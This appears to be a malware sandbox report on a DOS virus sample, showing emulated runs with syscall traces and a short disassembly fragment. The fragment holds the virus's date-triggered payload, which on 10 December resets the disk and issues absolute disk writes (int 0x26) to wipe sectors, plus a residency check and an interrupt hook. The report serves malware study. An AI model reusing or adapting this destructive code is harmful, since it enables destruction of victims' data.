Sample viewer

vx.netlux.org/Virus.DOS.DAN.WMA.709

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:09:48.991474971Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-17T22:09:48.994752962Z 250 PC: 12a73 | UNKNOWN!
2018-12-17T22:09:48.995538107Z 74 PC: 12ac8 | Reallocate memory
2018-12-17T22:09:48.996850139Z 72 PC: 12acf | Allocate memory
2018-12-17T22:09:49.008061124Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:09:49.009327621Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:09:49.010459448Z 76 PC: 12d0a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2214,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:09.226144898Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-25T11:45:09.229226415Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:45:09.229986405Z 74 PC: 12ac8 | Reallocate memory
2018-12-25T11:45:09.231477927Z 72 PC: 12acf | Allocate memory
2018-12-25T11:45:09.234303491Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.236449299Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.237927436Z 76 PC: 12d0a | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":10,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2214,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:09.462577046Z 42 PC: 12a52 | Get date 0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae6
0x12a7f: pop es
2018-12-25T11:45:09.465164637Z 13 PC: 12a5c | Disk reset
2018-12-25T11:45:09.46812238Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:45:09.469137601Z 74 PC: 12ac8 | Reallocate memory
2018-12-25T11:45:09.470774301Z 72 PC: 12acf | Allocate memory
2018-12-25T11:45:09.473091615Z 53 PC: 12aed | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.474501818Z 37 PC: 12afc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:09.475810997Z 76 PC: 12d0a | Terminate with return code (Return code = '0')